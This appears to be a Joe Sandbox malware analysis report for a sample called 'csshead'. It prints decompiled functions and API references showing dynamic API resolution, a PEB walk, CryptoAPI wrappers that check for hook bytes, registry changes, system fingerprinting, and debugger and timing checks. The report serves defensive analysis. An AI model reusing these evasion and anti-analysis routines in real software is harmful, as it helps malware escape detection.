Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00408A48, Relevance: 3.0, APIs: 2, Instructions: 34
nativewindow

C-Code - Quality: 58%

			E00408A48(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				void* _t12;
				void* _t24;

				_t12 = _a8 - 2;
				if(_t12 == 0) {
					PostQuitMessage(0);
					_v8 = 0;
				} else {
					if(_t12 == 0xf) {
						E004078FC(_a16 & 0x80000000, _t24);
						_v8 = 1;
					} else {
						_v8 =  *0x40b300(_a4, _a8, _a12, _a16);
					}
				}
				return _v8;
			}

0x00408a51
0x00408a54
0x00408a5f
0x00408a67
0x00408a56
0x00408a59
0x00408a74
0x00408a79
0x00408a5b
0x00408a98
0x00408a98
0x00408a59
0x00408aa1

APIs

PostQuitMessage.USER32(00000000), ref: 00408A5F

Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 0040795A
Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 0040796D

NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00408A92

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00401928, Relevance: 3.0, APIs: 2, Instructions: 33
library

C-Code - Quality: 100%

			E00401928(CHAR* __eax) {
				CHAR* _v8;
				_Unknown_base(*)()* _v12;
				CHAR* _v16;
				intOrPtr _v20;
				char _v149;
				void* _t37;

				_v8 = __eax;
				_v16 = _v8;
				while( *_v16 != 0x2e) {
					_v16 =  &(_v16[1]);
				}
				_v20 = _v16 - _v8;
				E004012B8( &_v149, _v20, _v8);
				 *((char*)(_t37 + _v20 - 0x91)) = 0;
				_v16 =  &(_v16[1]);
				_v12 = GetProcAddress(LoadLibraryA( &_v149), _v16);
				return _v12;
			}

0x00401931
0x00401937
0x0040193f
0x0040193c
0x0040193c
0x0040194d
0x0040195c
0x00401964
0x0040196c
0x00401987
0x00401990

APIs

LoadLibraryA.KERNEL32(00000000,00000000), ref: 0040197A
GetProcAddress.KERNEL32(00000000), ref: 00401981

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00403988, Relevance: 3.0, APIs: 2, Instructions: 24

C-Code - Quality: 84%

			E00403988(CHAR* __eax) {
				CHAR* _v8;
				signed char _v12;
				void* _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t16;

				_v8 = __eax;
				_v12 = 0;
				_t16 = FindFirstFileA(_v8,  &_v336);
				_v16 = _t16;
				asm("sbb eax, eax");
				_v12 =  ~(_t16 & 0xffffff00 | _v16 != 0xffffffff);
				FindClose(_v16);
				return _v12;
			}

0x00403991
0x00403996
0x004039a4
0x004039aa
0x004039b6
0x004039b8
0x004039bf
0x004039cb

APIs

FindFirstFileA.KERNEL32(?,?), ref: 004039A4
FindClose.KERNEL32(000000FF), ref: 004039BF

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00401460, Relevance: 3.0, APIs: 2, Instructions: 18

C-Code - Quality: 100%

			E00401460(void* __eax, long __edx) {
				void* _v8;
				long _v12;
				void* _v16;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = RtlReAllocateHeap(GetProcessHeap(), 0, _v8, _v12);
				return _v16;
			}

0x00401466
0x00401469
0x00401483
0x0040148c

APIs

GetProcessHeap.KERNEL32(00000000,?,?), ref: 00401476
RtlReAllocateHeap.NTDLL(00000000), ref: 0040147D

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00430D58, Relevance: 2.1, APIs: 1, Instructions: 592LIBRARYCODE

APIs

___mtold12.LIBCMT ref: 00431063

Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004064BC, Relevance: 1.6, APIs: 1, Instructions: 91

C-Code - Quality: 100%

			E004064BC(char* __eax, char __edx, void* __eflags) {
				char* _v8;
				char _v9;
				struct _OSVERSIONINFOA _v168;
				char _v233;
				intOrPtr _t68;

				_v9 = __edx;
				_v8 = __eax;
				E00401258(_v8, 0x51);
				 *_v8 = _v9;
				E004012B8(_v8 + 0x10, 0x12, 0x40b719);
				E004012B8(_v8 + 1, E004012DC(0x40b794), 0x40b794);
				E00401258( &_v168, 0x9c);
				_v168.dwOSVersionInfoSize = 0x9c;
				GetVersionExA( &_v168);
				E00401864(_v168.dwMajorVersion,  &_v233);
				 *((char*)(_v8 + 0x22)) = _v233;
				 *((char*)(_v8 + 0x23)) = 0x2e;
				E00401864(_v168.dwMinorVersion,  &_v233);
				 *((char*)(_v8 + 0x24)) = _v233;
				_t68 =  *0x40a068; // 0x3
				E00401864(_t68,  &_v233);
				 *((char*)(_v8 + 0x26)) = _v233;
				if( *0x40a058 == 0) {
					 *((char*)(_v8 + 0x27)) = 0x30;
				} else {
					 *((char*)(_v8 + 0x27)) = 0x31;
				}
				if( *0x40a034 == 0) {
					 *((char*)(_v8 + 0x28)) = 0x30;
				} else {
					 *((char*)(_v8 + 0x28)) = 0x31;
				}
				if(E00403EA0() == 0) {
					 *((char*)(_v8 + 0x25)) = 0x30;
				} else {
					 *((char*)(_v8 + 0x25)) = 0x31;
				}
				 *((intOrPtr*)(_v8 + 0x29)) = E00405468();
				return E00401308(_v8 + 0x2d, 0x40b00c);
			}

0x004064c5
0x004064c8
0x004064d3
0x004064de
0x004064f0
0x0040650a
0x0040651a
0x0040651f
0x00406530
0x00406544
0x00406555
0x0040655b
0x0040656d
0x0040657e
0x00406588
0x0040658e
0x0040659f
0x004065a9
0x004065b7
0x004065ab
0x004065ae
0x004065ae
0x004065c2
0x004065d0
0x004065c4
0x004065c7
0x004065c7
0x004065db
0x004065e9
0x004065dd
0x004065e0
0x004065e0
0x004065f5
0x0040660b

APIs

GetVersionExA.KERNEL32(0000009C), ref: 00406530

Part of subcall function 00401864: wsprintfA.USER32 ref: 00401874

Part of subcall function 00403EA0: RegCreateKeyExA.ADVAPI32(80000002,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00403ECD
Part of subcall function 00403EA0: RegCreateKeyExA.ADVAPI32(80000001,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00403EF3

Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00401AAE, Relevance: 1.5, APIs: 1, Instructions: 30encryption

APIs

CryptEncrypt.ADVAPI32(?,?,?,?,?,?,?), ref: 00401AE5

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00401AB0, Relevance: 1.5, APIs: 1, Instructions: 29encryption

APIs

CryptEncrypt.ADVAPI32(?,?,?,?,?,?,?), ref: 00401AE5

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 004017A2, Relevance: 1.5, APIs: 1, Instructions: 28
encryption

C-Code - Quality: 100%

			E004017A2(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
				long* _v8;
				long* _v12;
				int _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x40b460)) != 0xe9) {
					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
				}
				return _v20;
			}

0x004017aa
0x004017ad
0x004017b0
0x004017bb
0x004017db
0x004017db
0x004017e4

APIs

CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 004017D5

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 004017A4, Relevance: 1.5, APIs: 1, Instructions: 27
encryption

C-Code - Quality: 100%

			E004017A4(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
				long* _v8;
				long* _v12;
				int _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x40b460)) != 0xe9) {
					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
				}
				return _v20;
			}

0x004017aa
0x004017ad
0x004017b0
0x004017bb
0x004017db
0x004017db
0x004017e4

APIs

CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 004017D5

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 004018A0, Relevance: 1.5, APIs: 1, Instructions: 27
encryption

C-Code - Quality: 100%

			E004018A0(long* __eax, int __ecx, BYTE* __edx, HCRYPTKEY* _a4, int _a8, long* _a12) {
				long* _v8;
				BYTE* _v12;
				int _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x40b500)) != 0xe9) {
					_v20 = CryptImportKey(_v8, _v12, _v16, _a12, _a8, _a4);
				}
				return _v20;
			}

0x004018a6
0x004018a9
0x004018ac
0x004018b7
0x004018d7
0x004018d7
0x004018e0

APIs

CryptImportKey.ADVAPI32(?,?,?,?,?,?), ref: 004018D1

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00408A44, Relevance: 1.5, APIs: 1, Instructions: 26
nativewindow

C-Code - Quality: 58%

			E00408A44(intOrPtr* __eax, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				intOrPtr _v117;
				void* _t15;
				void* _t27;

				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				_t15 = _a12 - 2;
				if(_t15 == 0) {
					PostQuitMessage(0);
					_v8 = 0;
				} else {
					if(_t15 == 0xf) {
						E004078FC(_a16 & 0x80000000, _t27);
						_v8 = 1;
					} else {
						_v8 =  *0x40b300(_a4, _a8, _a12, _a16);
					}
				}
				return _v8;
			}

0x00408a45
0x00408a47
0x00408a51
0x00408a54
0x00408a5f
0x00408a67
0x00408a56
0x00408a59
0x00408a74
0x00408a79
0x00408a5b
0x00408a98
0x00408a98
0x00408a59
0x00408aa1

APIs

Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 0040795A
Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 0040796D

PostQuitMessage.USER32(00000000), ref: 00408A5F
NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00408A92

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 004017E8, Relevance: 1.5, APIs: 1, Instructions: 25
encryption

C-Code - Quality: 100%

			E004017E8(HCRYPTPROV* __eax, char* __ecx, char* __edx, int _a4, int _a8) {
				HCRYPTPROV* _v8;
				char* _v12;
				char* _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x40b4fc)) != 0xe9) {
					_v20 = CryptAcquireContextA(_v8, _v12, _v16, _a8, _a4);
				}
				return _v20;
			}

0x004017ee
0x004017f1
0x004017f4
0x004017ff
0x0040181b
0x0040181b
0x00401824

APIs

CryptAcquireContextA.ADVAPI32(?,?,?,?,?), ref: 00401815

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00401374, Relevance: 1.5, APIs: 1, Instructions: 25encryption

APIs

CryptCreateHash.ADVAPI32(?,?,?,?,?), ref: 004013A1

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00401490, Relevance: 1.5, APIs: 1, Instructions: 25encryption

APIs

CryptGetHashParam.ADVAPI32(?,?,?,?,?), ref: 004014BD

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00401402, Relevance: 1.5, APIs: 1, Instructions: 24encryption

APIs

CryptHashData.ADVAPI32(?,?,?,?), ref: 0040142D

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00401574, Relevance: 1.5, APIs: 1, Instructions: 23encryption

APIs

CryptSetKeyParam.ADVAPI32(?,?,?,?), ref: 0040159D

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00401404, Relevance: 1.5, APIs: 1, Instructions: 23encryption

APIs

CryptHashData.ADVAPI32(?,?,?,?), ref: 0040142D

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 0040153C, Relevance: 1.5, APIs: 1, Instructions: 21
encryption

C-Code - Quality: 100%

			E0040153C(long* __eax, BYTE* __ecx, int __edx) {
				long* _v8;
				int _v12;
				BYTE* _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x40b458)) != 0xe9) {
					_v20 = CryptGenRandom(_v8, _v12, _v16);
				}
				return _v20;
			}

0x00401542
0x00401545
0x00401548
0x00401553
0x00401567
0x00401567
0x00401570

APIs

CryptGenRandom.ADVAPI32(?,?,?), ref: 00401561

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00401B20, Relevance: 1.5, APIs: 1, Instructions: 18
encryption

C-Code - Quality: 100%

			E00401B20(long* __eax, int __edx) {
				long* _v8;
				int _v12;
				int _v16;

				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x40b50c)) != 0xe9) {
					_v16 = CryptReleaseContext(_v8, _v12);
				}
				return _v16;
			}

0x00401b26
0x00401b29
0x00401b34
0x00401b44
0x00401b44
0x00401b4d

APIs

CryptReleaseContext.ADVAPI32(?,?), ref: 00401B3E

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 004014D0, Relevance: 1.5, APIs: 1, Instructions: 16encryption

APIs

CryptDestroyHash.ADVAPI32(?), ref: 004014E7

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00401AF8, Relevance: 1.5, APIs: 1, Instructions: 16
encryption

C-Code - Quality: 100%

			E00401AF8(long* __eax) {
				long* _v8;
				int _v12;

				_v8 = __eax;
				if( *((char*)( *0x40b508)) != 0xe9) {
					_v12 = CryptDestroyKey(_v8);
				}
				return _v12;
			}

0x00401afe
0x00401b09
0x00401b15
0x00401b15
0x00401b1e

APIs

CryptDestroyKey.ADVAPI32(?), ref: 00401B0F

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00405468, Relevance: 1.5, APIs: 1, Instructions: 13
time

C-Code - Quality: 100%

			E00405468() {
				intOrPtr _v8;
				struct _SYSTEMTIME _v24;

				GetSystemTime( &_v24);
				_v8 = E004053D4( &_v24);
				return _v8;
			}

0x00405472
0x00405480
0x00405489

APIs

GetSystemTime.KERNEL32(?), ref: 00405472

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00406D40, Relevance: 1.5, APIs: 1, Instructions: 9

C-Code - Quality: 100%

			E00406D40() {
				int _v8;

				_v8 = IsDebuggerPresent();
				return _v8;
			}

0x00406d4a
0x00406d52

APIs

IsDebuggerPresent.KERNEL32 ref: 00406D44

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00406C6C, Relevance: .0, Instructions: 47

C-Code - Quality: 71%

			E00406C6C(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v29;
				void* _t19;

				_v12 = __eax;
				_push(__eax);
				asm("cpuid");
				_v8 = 0xbadbad;
				_pop(_t19);
				if(_v8 > 0) {
					E00406C08(0x80000002,  &_v29);
					E00401308(_v12,  &_v29);
					E00406C08(0x80000003,  &_v29);
					E0040133C(_v12,  &_v29);
					E00406C08(0x80000004,  &_v29);
					return E0040133C(_v12,  &_v29);
				}
				return _t19;
			}

0x00406c72
0x00406c75
0x00406c7e
0x00406c8a
0x00406c90
0x00406c95
0x00406c9f
0x00406caa
0x00406cb7
0x00406cc4
0x00406cd4
0x00000000
0x00406ce6
0x00406cec

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00406B18, Relevance: .0, Instructions: 32

C-Code - Quality: 65%

			E00406B18(char __eax, void* __ebx, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;

				_v24 = __eax;
				asm("rdtsc");
				_v12 = __eax;
				_v8 = __edx;
				asm("cpuid");
				asm("rdtsc");
				_v20 = 0;
				_v16 = __edx;
				 *((intOrPtr*)(_v24 + 4)) = _v16;
				 *_v24 = _v20;
				return E00406A38(_v24,  &_v12);
			}

0x00406b1e
0x00406b25
0x00406b27
0x00406b2a
0x00406b2f
0x00406b31
0x00406b33
0x00406b36
0x00406b43
0x00406b4c
0x00406b5c

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 004024F8, Relevance: .0, Instructions: 22

C-Code - Quality: 100%

			E004024F8() {
				intOrPtr _v8;
				intOrPtr* _t10;

				_t10 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x1c));
				do {
					_t10 =  *_t10;
				} while ( *((intOrPtr*)( *((intOrPtr*)(_t10 + 0x20)) + 0xc)) != 0x320033);
				_v8 =  *((intOrPtr*)(_t10 + 8));
				return _v8;
			}

0x00402509
0x0040250c
0x0040250c
0x00402511
0x0040251d
0x00402528

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 004010B4, Relevance: .0, Instructions: 17

C-Code - Quality: 46%

			E004010B4(void* __eax, signed int __edx) {
				signed int _v8;
				intOrPtr _v16;
				signed int _t9;
				signed int _t11;

				asm("rdtsc");
				asm("adc eax, esp");
				asm("rcl eax, 1");
				_t9 = (__eax +  *0x40b118 ^ _t11) + _v16 ^ _t11 ^ __edx;
				 *0x40b118 = _t9;
				_v8 = _t9;
				return _v8;
			}

0x004010b8
0x004010c0
0x004010c8
0x004010cc
0x004010ce
0x004010d4
0x004010dc

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 01961560, Relevance: .0, Instructions: 2

Memory Dump Source

Source File: 00000000.00000002.16599178748.01960000.00000040.sdmp, Offset: 01960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1960000_csshead.jbxd

Function 01963134, Relevance: .0, Instructions: 2

Memory Dump Source

Source File: 00000000.00000002.16599191923.01963000.00000040.sdmp, Offset: 01963000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1963000_csshead.jbxd

Function 00416AF0, Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 180windowstringthread

APIs

RtlEnterCriticalSection.NTDLL(00442B64), ref: 00416B05
GetCurrentThreadId.KERNEL32 ref: 00416B27
SetWindowsHookExA.USER32(00000005,Function_00006430,00442B90,00000000), ref: 00416B36

Part of subcall function 00411910: GetMonitorInfoA.USER32 ref: 0041196C

TrackPopupMenuEx.USER32(?,?,00000000,?,?,?), ref: 00416B89
